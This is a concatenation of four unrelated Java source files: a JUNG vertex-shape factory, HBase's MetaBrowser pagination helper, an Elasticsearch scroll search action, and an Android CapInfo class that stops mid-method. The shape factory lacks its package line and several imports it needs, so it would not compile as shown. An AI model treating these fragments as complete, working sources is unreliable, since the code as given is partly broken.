import java.awt.geom.Point2D;
import java.awt.geom.Rectangle2D;
import java.awt.geom.RoundRectangle2D;
import edu.uci.ics.jung.graph.Vertex;
import edu.uci.ics.jung.graph.decorators.ConstantVertexAspectRatioFunction;
import edu.uci.ics.jung.graph.decorators.ConstantVertexSizeFunction;
import edu.uci.ics.jung.graph.decorators.VertexAspectRatioFunction;
import edu.uci.ics.jung.graph.decorators.VertexSizeFunction;
/**
* A utility class for generating <code>Shape</code>s for drawing vertices.
* The available shapes include rectangles, rounded rectangles, ellipses,
* regular polygons, and regular stars. The dimensions of the requested
* shapes are defined by the specified <code>VertexSizeFunction</code>
* and <code>VertexAspectRatioFunction</code> implementations: the width
* of the bounding box of the shape is given by the vertex size, and the
* height is given by the size multiplied by the vertex's aspect ratio.
*
* @author Joshua O'Madadhain
*/
public class VertexShapeFactory
{
protected VertexSizeFunction vsf;
protected VertexAspectRatioFunction varf;
/**
* Creates a <code>VertexShapeFactory</code> with the specified
* vertex size and aspect ratio functions.
*/
public VertexShapeFactory(VertexSizeFunction vsf, VertexAspectRatioFunction varf)
{
this.vsf = vsf;
this.varf = varf;
}
/**
* Creates a <code>VertexShapeFactory</code> with a constant size of
* 10 and a constant aspect ratio of 1.
*/
public VertexShapeFactory()
{
this(new ConstantVertexSizeFunction(10),
new ConstantVertexAspectRatioFunction(1.0f));
}
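    /*
     * Usage sketch (editor's addition, assuming a JUNG Vertex v is available):
     *
     *     VertexShapeFactory factory = new VertexShapeFactory(
     *         new ConstantVertexSizeFunction(20),
     *         new ConstantVertexAspectRatioFunction(0.5f));
     *     Shape ellipse = factory.getEllipse(v); // 20 wide, 10 tall, centered on (0,0)
     *
     * Note that the returned shapes are backed by shared static instances, so each shape
     * should be drawn or copied before the next call to this factory.
     */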
private static final Rectangle2D theRectangle = new Rectangle2D.Float();
/**
* Returns a <code>Rectangle2D</code> whose width and
* height are defined by this instance's size and
* aspect ratio functions for this vertex.
*/
public Rectangle2D getRectangle(Vertex v)
{
float width = vsf.getSize(v);
float height = width * varf.getAspectRatio(v);
float h_offset = -(width / 2);
float v_offset = -(height / 2);
theRectangle.setFrame(h_offset, v_offset, width, height);
return theRectangle;
}
private static final Ellipse2D theEllipse = new Ellipse2D.Float();
/**
     * Returns an <code>Ellipse2D</code> whose width and
* height are defined by this instance's size and
* aspect ratio functions for this vertex.
*/
public Ellipse2D getEllipse(Vertex v)
{
theEllipse.setFrame(getRectangle(v));
return theEllipse;
}
private static final RoundRectangle2D theRoundRectangle =
new RoundRectangle2D.Float();
/**
* Returns a <code>RoundRectangle2D</code> whose width and
* height are defined by this instance's size and
* aspect ratio functions for this vertex. The arc size is
* set to be half the minimum of the height and width of the frame.
*/
public RoundRectangle2D getRoundRectangle(Vertex v)
{
Rectangle2D frame = getRectangle(v);
float arc_size = (float)Math.min(frame.getHeight(), frame.getWidth()) / 2;
theRoundRectangle.setRoundRect(frame.getX(), frame.getY(),
frame.getWidth(), frame.getHeight(), arc_size, arc_size);
return theRoundRectangle;
}
private static final GeneralPath thePolygon = new GeneralPath();
/**
* Returns a regular <code>num_sides</code>-sided
* <code>Polygon</code> whose bounding
* box's width and height are defined by this instance's size and
* aspect ratio functions for this vertex.
* @param num_sides the number of sides of the polygon; must be >= 3.
*/
public Shape getRegularPolygon(Vertex v, int num_sides)
{
if (num_sides < 3)
throw new IllegalArgumentException("Number of sides must be >= 3");
Rectangle2D frame = getRectangle(v);
float width = (float)frame.getWidth();
float height = (float)frame.getHeight();
// generate coordinates
double angle = 0;
thePolygon.reset();
thePolygon.moveTo(0,0);
thePolygon.lineTo(width, 0);
double theta = (2 * Math.PI) / num_sides;
for (int i = 2; i < num_sides; i++)
{
angle -= theta;
float delta_x = (float) (width * Math.cos(angle));
float delta_y = (float) (width * Math.sin(angle));
Point2D prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
}
thePolygon.closePath();
// scale polygon to be right size, translate to center at (0,0)
Rectangle2D r = thePolygon.getBounds2D();
double scale_x = width / r.getWidth();
double scale_y = height / r.getHeight();
float translationX = (float) (r.getMinX() + r.getWidth()/2);
float translationY = (float) (r.getMinY() + r.getHeight()/2);
AffineTransform at = AffineTransform.getScaleInstance(scale_x, scale_y);
at.translate(-translationX, -translationY);
Shape shape = at.createTransformedShape(thePolygon);
return shape;
}
    /**
     * Returns a regular star <code>Polygon</code> with <code>num_points</code>
     * points whose bounding
     * box's width and height are defined by this instance's size and
     * aspect ratio functions for this vertex.
     * @param num_points the number of points of the star; must be >= 5.
     */
    public Shape getRegularStar(Vertex v, int num_points)
    {
        if (num_points < 5)
            throw new IllegalArgumentException("Number of points must be >= 5");
Rectangle2D frame = getRectangle(v);
float width = (float) frame.getWidth();
float height = (float) frame.getHeight();
// generate coordinates
double theta = (2 * Math.PI) / num_points;
double angle = -theta/2;
thePolygon.reset();
thePolygon.moveTo(0,0);
float delta_x = width * (float)Math.cos(angle);
float delta_y = width * (float)Math.sin(angle);
Point2D prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
for (int i = 1; i < num_points; i++)
{
angle += theta;
delta_x = width * (float)Math.cos(angle);
delta_y = width * (float)Math.sin(angle);
prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
angle -= theta*2;
delta_x = width * (float)Math.cos(angle);
delta_y = width * (float)Math.sin(angle);
prev = thePolygon.getCurrentPoint();
thePolygon.lineTo((float)prev.getX() + delta_x, (float)prev.getY() + delta_y);
}
thePolygon.closePath();
// scale polygon to be right size, translate to center at (0,0)
Rectangle2D r = thePolygon.getBounds2D();
double scale_x = width / r.getWidth();
double scale_y = height / r.getHeight();
float translationX = (float) (r.getMinX() + r.getWidth()/2);
float translationY = (float) (r.getMinY() + r.getHeight()/2);
AffineTransform at = AffineTransform.getScaleInstance(scale_x, scale_y);
at.translate(-translationX, -translationY);
Shape shape = at.createTransformedShape(thePolygon);
return shape;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hbase.master.webapp;
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.stream.StreamSupport;
import javax.servlet.http.HttpServletRequest;
import org.apache.commons.lang3.StringUtils;
import org.apache.commons.lang3.builder.ToStringBuilder;
import org.apache.commons.lang3.builder.ToStringStyle;
import org.apache.hadoop.hbase.CompareOperator;
import org.apache.hadoop.hbase.HConstants;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.AdvancedScanResultConsumer;
import org.apache.hadoop.hbase.client.AsyncConnection;
import org.apache.hadoop.hbase.client.AsyncTable;
import org.apache.hadoop.hbase.client.ResultScanner;
import org.apache.hadoop.hbase.client.Scan;
import org.apache.hadoop.hbase.filter.Filter;
import org.apache.hadoop.hbase.filter.FilterList;
import org.apache.hadoop.hbase.filter.PrefixFilter;
import org.apache.hadoop.hbase.filter.SingleColumnValueFilter;
import org.apache.hadoop.hbase.master.RegionState;
import org.apache.hadoop.hbase.util.Bytes;
import org.apache.yetus.audience.InterfaceAudience;
import org.apache.hbase.thirdparty.com.google.common.collect.Iterators;
import org.apache.hbase.thirdparty.io.netty.handler.codec.http.QueryStringEncoder;
/**
* <p>
* Support class for the "Meta Entries" section in {@code resources/hbase-webapps/master/table.jsp}.
* </p>
* <p>
 * <b>Interface</b>. This class's intended consumer is {@code table.jsp}. As such, its primary
* interface is the active {@link HttpServletRequest}, from which it uses the {@code scan_*}
* request parameters. This class supports paging through an optionally filtered view of the
* contents of {@code hbase:meta}. Those filters and the pagination offset are specified via these
* request parameters. It provides helper methods for constructing pagination links.
* <ul>
* <li>{@value #NAME_PARAM} - the name of the table requested. The only table of our concern here
* is {@code hbase:meta}; any other value is effectively ignored by the giant conditional in the
* jsp.</li>
 * <li>{@value #SCAN_LIMIT_PARAM} - specifies a limit on the number of regions (and region replicas)
 * rendered by the table in a single request -- a limit on page size. This corresponds to the
* number of {@link RegionReplicaInfo} objects produced by {@link Results#iterator()}. When a
* value for {@code scan_limit} is invalid or not specified, the default value of
* {@value #SCAN_LIMIT_DEFAULT} is used. In order to avoid excessive resource consumption, a
* maximum value of {@value #SCAN_LIMIT_MAX} is enforced.</li>
* <li>{@value #SCAN_REGION_STATE_PARAM} - an optional filter on {@link RegionState}.</li>
* <li>{@value #SCAN_START_PARAM} - specifies the rowkey at which a scan should start. For usage
* details, see the below section on <b>Pagination</b>.</li>
* <li>{@value #SCAN_TABLE_PARAM} - specifies a filter on the values returned, limiting them to
* regions from a specified table. This parameter is implemented as a prefix filter on the
* {@link Scan}, so in effect it can be used for simple namespace and multi-table matches.</li>
* </ul>
* </p>
* <p>
 * <b>Pagination</b>. A single page of results is made available via {@link #getResults()} / an
 * instance of {@link Results}. Callers use its {@link Iterator} to consume the page of
* {@link RegionReplicaInfo} instances, each of which represents a region or region replica. Helper
* methods are provided for building page navigation controls preserving the user's selected filter
* set: {@link #buildFirstPageUrl()}, {@link #buildNextPageUrl(byte[])}. Pagination is implemented
* using a simple offset + limit system. Offset is provided by the {@value #SCAN_START_PARAM},
* limit via {@value #SCAN_LIMIT_PARAM}. Under the hood, the {@link Scan} is constructed with
 * {@link Scan#setLimit(int)} set to ({@value #SCAN_LIMIT_PARAM} + 1), while the
* {@link Results} {@link Iterator} honors {@value #SCAN_LIMIT_PARAM}. The +1 allows the caller to
* know if a "next page" is available via {@link Results#hasMoreResults()}. Note that this
* pagination strategy is incomplete when it comes to region replicas and can potentially omit
* rendering replicas that fall between the last rowkey offset and {@code replicaCount % page size}.
* </p>
* <p>
* <b>Error Messages</b>. Any time there's an error parsing user input, a message will be populated
* in {@link #getErrorMessages()}. Any fields which produce an error will have their filter values
* set to the default, except for a value of {@value #SCAN_LIMIT_PARAM} that exceeds
* {@value #SCAN_LIMIT_MAX}, in which case {@value #SCAN_LIMIT_MAX} is used.
* </p>
*/
@InterfaceAudience.Private
public class MetaBrowser {
public static final String NAME_PARAM = "name";
public static final String SCAN_LIMIT_PARAM = "scan_limit";
public static final String SCAN_REGION_STATE_PARAM = "scan_region_state";
public static final String SCAN_START_PARAM = "scan_start";
public static final String SCAN_TABLE_PARAM = "scan_table";
public static final int SCAN_LIMIT_DEFAULT = 10;
public static final int SCAN_LIMIT_MAX = 10_000;
private final AsyncConnection connection;
private final HttpServletRequest request;
private final List<String> errorMessages;
private final String name;
private final Integer scanLimit;
private final RegionState.State scanRegionState;
private final byte[] scanStart;
private final TableName scanTable;
public MetaBrowser(final AsyncConnection connection, final HttpServletRequest request) {
this.connection = connection;
this.request = request;
this.errorMessages = new LinkedList<>();
this.name = resolveName(request);
this.scanLimit = resolveScanLimit(request);
this.scanRegionState = resolveScanRegionState(request);
this.scanStart = resolveScanStart(request);
this.scanTable = resolveScanTable(request);
}
public List<String> getErrorMessages() {
return errorMessages;
}
public String getName() {
return name;
}
public Integer getScanLimit() {
return scanLimit;
}
public byte[] getScanStart() {
return scanStart;
}
public RegionState.State getScanRegionState() {
return scanRegionState;
}
public TableName getScanTable() {
return scanTable;
}
public Results getResults() {
final AsyncTable<AdvancedScanResultConsumer> asyncTable =
connection.getTable(TableName.META_TABLE_NAME);
return new Results(asyncTable.getScanner(buildScan()));
}
@Override
public String toString() {
return new ToStringBuilder(this, ToStringStyle.SHORT_PREFIX_STYLE)
.append("scanStart", scanStart)
.append("scanLimit", scanLimit)
.append("scanTable", scanTable)
.append("scanRegionState", scanRegionState)
.toString();
}
private static String resolveName(final HttpServletRequest request) {
return resolveRequestParameter(request, NAME_PARAM);
}
private Integer resolveScanLimit(final HttpServletRequest request) {
final String requestValueStr = resolveRequestParameter(request, SCAN_LIMIT_PARAM);
if (StringUtils.isBlank(requestValueStr)) {
return null;
}
final Integer requestValue = tryParseInt(requestValueStr);
if (requestValue == null) {
errorMessages.add(buildScanLimitMalformedErrorMessage(requestValueStr));
return null;
}
if (requestValue <= 0) {
errorMessages.add(buildScanLimitLTEQZero(requestValue));
return SCAN_LIMIT_DEFAULT;
}
final int truncatedValue = Math.min(requestValue, SCAN_LIMIT_MAX);
if (requestValue != truncatedValue) {
errorMessages.add(buildScanLimitExceededErrorMessage(requestValue));
}
return truncatedValue;
}
private RegionState.State resolveScanRegionState(final HttpServletRequest request) {
final String requestValueStr = resolveRequestParameter(request, SCAN_REGION_STATE_PARAM);
if (requestValueStr == null) {
return null;
}
final RegionState.State requestValue = tryValueOf(RegionState.State.class, requestValueStr);
if (requestValue == null) {
errorMessages.add(buildScanRegionStateMalformedErrorMessage(requestValueStr));
return null;
}
return requestValue;
}
private static byte[] resolveScanStart(final HttpServletRequest request) {
// TODO: handle replicas that fall between the last rowkey and pagination limit.
final String requestValue = resolveRequestParameter(request, SCAN_START_PARAM);
if (requestValue == null) {
return null;
}
return Bytes.toBytesBinary(requestValue);
}
private static TableName resolveScanTable(final HttpServletRequest request) {
final String requestValue = resolveRequestParameter(request, SCAN_TABLE_PARAM);
if (requestValue == null) {
return null;
}
return TableName.valueOf(requestValue);
}
private static String resolveRequestParameter(final HttpServletRequest request,
final String param) {
if (request == null) {
return null;
}
final String requestValueStrEnc = request.getParameter(param);
if (StringUtils.isBlank(requestValueStrEnc)) {
return null;
}
return urlDecode(requestValueStrEnc);
}
private static Filter buildTableFilter(final TableName tableName) {
return new PrefixFilter(tableName.toBytes());
}
private static Filter buildScanRegionStateFilter(final RegionState.State state) {
return new SingleColumnValueFilter(
HConstants.CATALOG_FAMILY,
HConstants.STATE_QUALIFIER,
CompareOperator.EQUAL,
// use the same serialization strategy as found in MetaTableAccessor#addRegionStateToPut
Bytes.toBytes(state.name()));
}
private Filter buildScanFilter() {
if (scanTable == null && scanRegionState == null) {
return null;
}
final List<Filter> filters = new ArrayList<>(2);
if (scanTable != null) {
filters.add(buildTableFilter(scanTable));
}
if (scanRegionState != null) {
filters.add(buildScanRegionStateFilter(scanRegionState));
}
if (filters.size() == 1) {
return filters.get(0);
}
return new FilterList(FilterList.Operator.MUST_PASS_ALL, filters);
}
private Scan buildScan() {
final Scan metaScan = new Scan()
.addFamily(HConstants.CATALOG_FAMILY)
.readVersions(1)
.setLimit((scanLimit != null ? scanLimit : SCAN_LIMIT_DEFAULT) + 1);
if (scanStart != null) {
metaScan.withStartRow(scanStart, false);
}
final Filter filter = buildScanFilter();
if (filter != null) {
metaScan.setFilter(filter);
}
return metaScan;
}
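  // Note: buildScan() asks for one row more than the effective scan_limit; that extra row lets
  // Results#hasMoreResults() report whether a further page exists, while Results#iterator()
  // trims the output back down to scan_limit.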
/**
* Adds {@code value} to {@code encoder} under {@code paramName} when {@code value} is non-null.
*/
private void addParam(final QueryStringEncoder encoder, final String paramName,
final Object value) {
if (value != null) {
encoder.addParam(paramName, value.toString());
}
}
private QueryStringEncoder buildFirstPageEncoder() {
final QueryStringEncoder encoder =
new QueryStringEncoder(request.getRequestURI());
addParam(encoder, NAME_PARAM, name);
addParam(encoder, SCAN_LIMIT_PARAM, scanLimit);
addParam(encoder, SCAN_REGION_STATE_PARAM, scanRegionState);
addParam(encoder, SCAN_TABLE_PARAM, scanTable);
return encoder;
}
public String buildFirstPageUrl() {
return buildFirstPageEncoder().toString();
}
static String buildStartParamFrom(final byte[] lastRow) {
if (lastRow == null) {
return null;
}
return urlEncode(Bytes.toStringBinary(lastRow));
}
public String buildNextPageUrl(final byte[] lastRow) {
final QueryStringEncoder encoder = buildFirstPageEncoder();
final String startRow = buildStartParamFrom(lastRow);
addParam(encoder, SCAN_START_PARAM, startRow);
return encoder.toString();
}
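  /*
   * Illustrative example (editor's sketch): for a request carrying scan_limit=5 and
   * scan_table=foo, buildNextPageUrl(lastRow) yields roughly
   *
   *     <request URI>?scan_limit=5&scan_table=foo&scan_start=<URL-encoded lastRow>
   *
   * i.e. the first-page parameters plus SCAN_START_PARAM derived from the last rendered
   * rowkey; exact ordering and encoding are those of Netty's QueryStringEncoder.
   */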
private static String urlEncode(final String val) {
if (StringUtils.isEmpty(val)) {
return null;
}
try {
return URLEncoder.encode(val, StandardCharsets.UTF_8.toString());
} catch (UnsupportedEncodingException e) {
return null;
}
}
private static String urlDecode(final String val) {
if (StringUtils.isEmpty(val)) {
return null;
}
try {
return URLDecoder.decode(val, StandardCharsets.UTF_8.toString());
} catch (UnsupportedEncodingException e) {
return null;
}
}
private static Integer tryParseInt(final String val) {
if (StringUtils.isEmpty(val)) {
return null;
}
try {
return Integer.parseInt(val);
} catch (NumberFormatException e) {
return null;
}
}
private static <T extends Enum<T>> T tryValueOf(final Class<T> clazz,
final String value) {
if (clazz == null || value == null) {
return null;
}
try {
return Enum.valueOf(clazz, value);
} catch (IllegalArgumentException e) {
return null;
}
}
private static String buildScanLimitExceededErrorMessage(final int requestValue) {
return String.format(
"Requested SCAN_LIMIT value %d exceeds maximum value %d.", requestValue, SCAN_LIMIT_MAX);
}
private static String buildScanLimitMalformedErrorMessage(final String requestValue) {
return String.format(
"Requested SCAN_LIMIT value '%s' cannot be parsed as an integer.", requestValue);
}
private static String buildScanLimitLTEQZero(final int requestValue) {
return String.format("Requested SCAN_LIMIT value %d is <= 0.", requestValue);
}
private static String buildScanRegionStateMalformedErrorMessage(final String requestValue) {
return String.format(
"Requested SCAN_REGION_STATE value '%s' cannot be parsed as a RegionState.", requestValue);
}
/**
* Encapsulates the results produced by this {@link MetaBrowser} instance.
*/
public final class Results implements AutoCloseable, Iterable<RegionReplicaInfo> {
private final ResultScanner resultScanner;
private final Iterator<RegionReplicaInfo> sourceIterator;
private Results(final ResultScanner resultScanner) {
this.resultScanner = resultScanner;
this.sourceIterator = StreamSupport.stream(resultScanner.spliterator(), false)
.map(RegionReplicaInfo::from)
.flatMap(Collection::stream)
.iterator();
}
/**
* @return {@code true} when the underlying {@link ResultScanner} is not yet exhausted,
* {@code false} otherwise.
*/
public boolean hasMoreResults() {
return sourceIterator.hasNext();
}
@Override
public void close() {
if (resultScanner != null) {
resultScanner.close();
}
}
@Override public Iterator<RegionReplicaInfo> iterator() {
return Iterators.limit(sourceIterator, scanLimit != null ? scanLimit : SCAN_LIMIT_DEFAULT);
}
}
}
|
|
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.action.search;
import com.carrotsearch.hppc.IntArrayList;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.message.ParameterizedMessage;
import org.apache.logging.log4j.util.Supplier;
import org.apache.lucene.search.ScoreDoc;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.cluster.node.DiscoveryNode;
import org.elasticsearch.cluster.node.DiscoveryNodes;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.common.util.concurrent.AtomicArray;
import org.elasticsearch.common.util.concurrent.CountDown;
import org.elasticsearch.search.fetch.FetchSearchResult;
import org.elasticsearch.search.fetch.ShardFetchRequest;
import org.elasticsearch.search.internal.InternalScrollSearchRequest;
import org.elasticsearch.search.internal.InternalSearchResponse;
import org.elasticsearch.search.query.QuerySearchResult;
import org.elasticsearch.search.query.ScrollQuerySearchResult;
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;
import static org.elasticsearch.action.search.TransportSearchHelper.internalScrollSearchRequest;
final class SearchScrollQueryThenFetchAsyncAction extends AbstractAsyncAction {
private final Logger logger;
private final SearchTask task;
private final SearchTransportService searchTransportService;
private final SearchPhaseController searchPhaseController;
private final SearchScrollRequest request;
private final ActionListener<SearchResponse> listener;
private final ParsedScrollId scrollId;
private final DiscoveryNodes nodes;
private volatile AtomicArray<ShardSearchFailure> shardFailures;
final AtomicArray<QuerySearchResult> queryResults;
final AtomicArray<FetchSearchResult> fetchResults;
private volatile ScoreDoc[] sortedShardDocs;
private final AtomicInteger successfulOps;
SearchScrollQueryThenFetchAsyncAction(Logger logger, ClusterService clusterService, SearchTransportService searchTransportService,
SearchPhaseController searchPhaseController, SearchScrollRequest request, SearchTask task,
ParsedScrollId scrollId, ActionListener<SearchResponse> listener) {
this.logger = logger;
this.searchTransportService = searchTransportService;
this.searchPhaseController = searchPhaseController;
this.request = request;
this.task = task;
this.listener = listener;
this.scrollId = scrollId;
this.nodes = clusterService.state().nodes();
this.successfulOps = new AtomicInteger(scrollId.getContext().length);
this.queryResults = new AtomicArray<>(scrollId.getContext().length);
this.fetchResults = new AtomicArray<>(scrollId.getContext().length);
}
private ShardSearchFailure[] buildShardFailures() {
if (shardFailures == null) {
return ShardSearchFailure.EMPTY_ARRAY;
}
List<ShardSearchFailure> failures = shardFailures.asList();
return failures.toArray(new ShardSearchFailure[failures.size()]);
}
    // we do our best to return the shard failures, but it's ok if it's not fully concurrency safe;
    // we simply try to return as much as possible
private void addShardFailure(final int shardIndex, ShardSearchFailure failure) {
if (shardFailures == null) {
shardFailures = new AtomicArray<>(scrollId.getContext().length);
}
shardFailures.set(shardIndex, failure);
}
public void start() {
if (scrollId.getContext().length == 0) {
listener.onFailure(new SearchPhaseExecutionException("query", "no nodes to search on", ShardSearchFailure.EMPTY_ARRAY));
return;
}
final CountDown counter = new CountDown(scrollId.getContext().length);
ScrollIdForNode[] context = scrollId.getContext();
for (int i = 0; i < context.length; i++) {
ScrollIdForNode target = context[i];
DiscoveryNode node = nodes.get(target.getNode());
if (node != null) {
executeQueryPhase(i, counter, node, target.getScrollId());
} else {
if (logger.isDebugEnabled()) {
logger.debug("Node [{}] not available for scroll request [{}]", target.getNode(), scrollId.getSource());
}
successfulOps.decrementAndGet();
if (counter.countDown()) {
try {
executeFetchPhase();
} catch (Exception e) {
listener.onFailure(new SearchPhaseExecutionException("query", "Fetch failed", e, ShardSearchFailure.EMPTY_ARRAY));
return;
}
}
}
}
}
private void executeQueryPhase(final int shardIndex, final CountDown counter, DiscoveryNode node, final long searchId) {
InternalScrollSearchRequest internalRequest = internalScrollSearchRequest(searchId, request);
searchTransportService.sendExecuteScrollQuery(node, internalRequest, task,
new SearchActionListener<ScrollQuerySearchResult>(null, shardIndex) {
@Override
protected void setSearchShardTarget(ScrollQuerySearchResult response) {
// don't do this - it's part of the response...
assert response.getSearchShardTarget() != null : "search shard target must not be null";
}
@Override
protected void innerOnResponse(ScrollQuerySearchResult result) {
queryResults.setOnce(result.getShardIndex(), result.queryResult());
if (counter.countDown()) {
try {
executeFetchPhase();
} catch (Exception e) {
onFailure(e);
}
}
}
@Override
public void onFailure(Exception t) {
onQueryPhaseFailure(shardIndex, counter, searchId, t);
}
});
}
void onQueryPhaseFailure(final int shardIndex, final CountDown counter, final long searchId, Exception failure) {
if (logger.isDebugEnabled()) {
logger.debug((Supplier<?>) () -> new ParameterizedMessage("[{}] Failed to execute query phase", searchId), failure);
}
addShardFailure(shardIndex, new ShardSearchFailure(failure));
successfulOps.decrementAndGet();
if (counter.countDown()) {
if (successfulOps.get() == 0) {
listener.onFailure(new SearchPhaseExecutionException("query", "all shards failed", failure, buildShardFailures()));
} else {
try {
executeFetchPhase();
} catch (Exception e) {
e.addSuppressed(failure);
listener.onFailure(new SearchPhaseExecutionException("query", "Fetch failed", e, ShardSearchFailure.EMPTY_ARRAY));
}
}
}
}
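    // Fetch phase: sorts the collected per-shard query results into a global doc order, reduces
    // them, fetches the referenced documents from each shard, and merges everything in finishHim().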
private void executeFetchPhase() throws Exception {
sortedShardDocs = searchPhaseController.sortDocs(true, queryResults.asList(), queryResults.length());
if (sortedShardDocs.length == 0) {
finishHim(searchPhaseController.reducedQueryPhase(queryResults.asList()));
return;
}
final IntArrayList[] docIdsToLoad = searchPhaseController.fillDocIdsToLoad(queryResults.length(), sortedShardDocs);
SearchPhaseController.ReducedQueryPhase reducedQueryPhase = searchPhaseController.reducedQueryPhase(queryResults.asList());
final ScoreDoc[] lastEmittedDocPerShard = searchPhaseController.getLastEmittedDocPerShard(reducedQueryPhase, sortedShardDocs,
queryResults.length());
final CountDown counter = new CountDown(docIdsToLoad.length);
for (int i = 0; i < docIdsToLoad.length; i++) {
final int index = i;
final IntArrayList docIds = docIdsToLoad[index];
if (docIds != null) {
final QuerySearchResult querySearchResult = queryResults.get(index);
ScoreDoc lastEmittedDoc = lastEmittedDocPerShard[index];
ShardFetchRequest shardFetchRequest = new ShardFetchRequest(querySearchResult.getRequestId(), docIds, lastEmittedDoc);
DiscoveryNode node = nodes.get(querySearchResult.getSearchShardTarget().getNodeId());
searchTransportService.sendExecuteFetchScroll(node, shardFetchRequest, task,
new SearchActionListener<FetchSearchResult>(querySearchResult.getSearchShardTarget(), index) {
@Override
protected void innerOnResponse(FetchSearchResult response) {
fetchResults.setOnce(response.getShardIndex(), response);
if (counter.countDown()) {
finishHim(reducedQueryPhase);
}
}
@Override
public void onFailure(Exception t) {
if (logger.isDebugEnabled()) {
logger.debug("Failed to execute fetch phase", t);
}
successfulOps.decrementAndGet();
if (counter.countDown()) {
finishHim(reducedQueryPhase);
}
}
});
} else {
// the counter is set to the total size of docIdsToLoad which can have null values so we have to count them down too
if (counter.countDown()) {
finishHim(reducedQueryPhase);
}
}
}
}
private void finishHim(SearchPhaseController.ReducedQueryPhase queryPhase) {
try {
final InternalSearchResponse internalResponse = searchPhaseController.merge(true, sortedShardDocs, queryPhase,
fetchResults.asList(), fetchResults::get);
String scrollId = null;
if (request.scroll() != null) {
scrollId = request.scrollId();
}
listener.onResponse(new SearchResponse(internalResponse, scrollId, this.scrollId.getContext().length, successfulOps.get(),
buildTookInMillis(), buildShardFailures()));
} catch (Exception e) {
listener.onFailure(new ReduceSearchPhaseException("fetch", "inner finish failed", e, buildShardFailures()));
}
}
}
|
|
/*
* Copyright (c) 2016 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.ims.internal.uce.common;
import android.os.Parcel;
import android.os.Parcelable;
import android.util.Log;
/** Class for capability discovery information.
* @hide */
public class CapInfo implements Parcelable {
/** IM session support. */
private boolean mImSupported = false;
/** File transfer support. */
private boolean mFtSupported = false;
/** File transfer Thumbnail support. */
private boolean mFtThumbSupported = false;
/** File transfer Store and forward support. */
private boolean mFtSnFSupported = false;
/** File transfer HTTP support. */
private boolean mFtHttpSupported = false;
/** Image sharing support. */
private boolean mIsSupported = false;
/** Video sharing during a CS call support -- IR-74. */
private boolean mVsDuringCSSupported = false;
/** Video sharing outside of voice call support -- IR-84. */
private boolean mVsSupported = false;
/** Social presence support. */
private boolean mSpSupported = false;
/** Presence discovery support. */
private boolean mCdViaPresenceSupported = false;
/** IP voice call support (IR-92/IR-58). */
private boolean mIpVoiceSupported = false;
/** IP video call support (IR-92/IR-58). */
private boolean mIpVideoSupported = false;
/** IP Geo location Pull using File Transfer support. */
private boolean mGeoPullFtSupported = false;
/** IP Geo location Pull support. */
private boolean mGeoPullSupported = false;
/** IP Geo location Push support. */
private boolean mGeoPushSupported = false;
/** Standalone messaging support. */
private boolean mSmSupported = false;
/** Full Store and Forward Group Chat information. */
private boolean mFullSnFGroupChatSupported = false;
   /** RCS IP Voice call support. */
   private boolean mRcsIpVoiceCallSupported = false;
   /** RCS IP Video call support. */
   private boolean mRcsIpVideoCallSupported = false;
   /** RCS IP Video only call support. */
   private boolean mRcsIpVideoOnlyCallSupported = false;
/** List of supported extensions. */
private String[] mExts = new String[10];
/** Time used to compute when to query again. */
private long mCapTimestamp = 0;
/**
* Constructor for the CapInfo class.
*/
   public CapInfo() {
   }
/**
* Checks whether IM is supported.
*/
public boolean isImSupported() {
return mImSupported;
}
/**
* Sets IM as supported or not supported.
*/
public void setImSupported(boolean imSupported) {
this.mImSupported = imSupported;
}
/**
* Checks whether FT Thumbnail is supported.
*/
public boolean isFtThumbSupported() {
return mFtThumbSupported;
}
/**
* Sets FT thumbnail as supported or not supported.
*/
public void setFtThumbSupported(boolean ftThumbSupported) {
this.mFtThumbSupported = ftThumbSupported;
}
/**
* Checks whether FT Store and Forward is supported
*/
public boolean isFtSnFSupported() {
return mFtSnFSupported;
}
/**
* Sets FT Store and Forward as supported or not supported.
*/
public void setFtSnFSupported(boolean ftSnFSupported) {
this.mFtSnFSupported = ftSnFSupported;
}
/**
* Checks whether File transfer HTTP is supported.
*/
public boolean isFtHttpSupported() {
return mFtHttpSupported;
}
/**
* Sets File transfer HTTP as supported or not supported.
*/
public void setFtHttpSupported(boolean ftHttpSupported) {
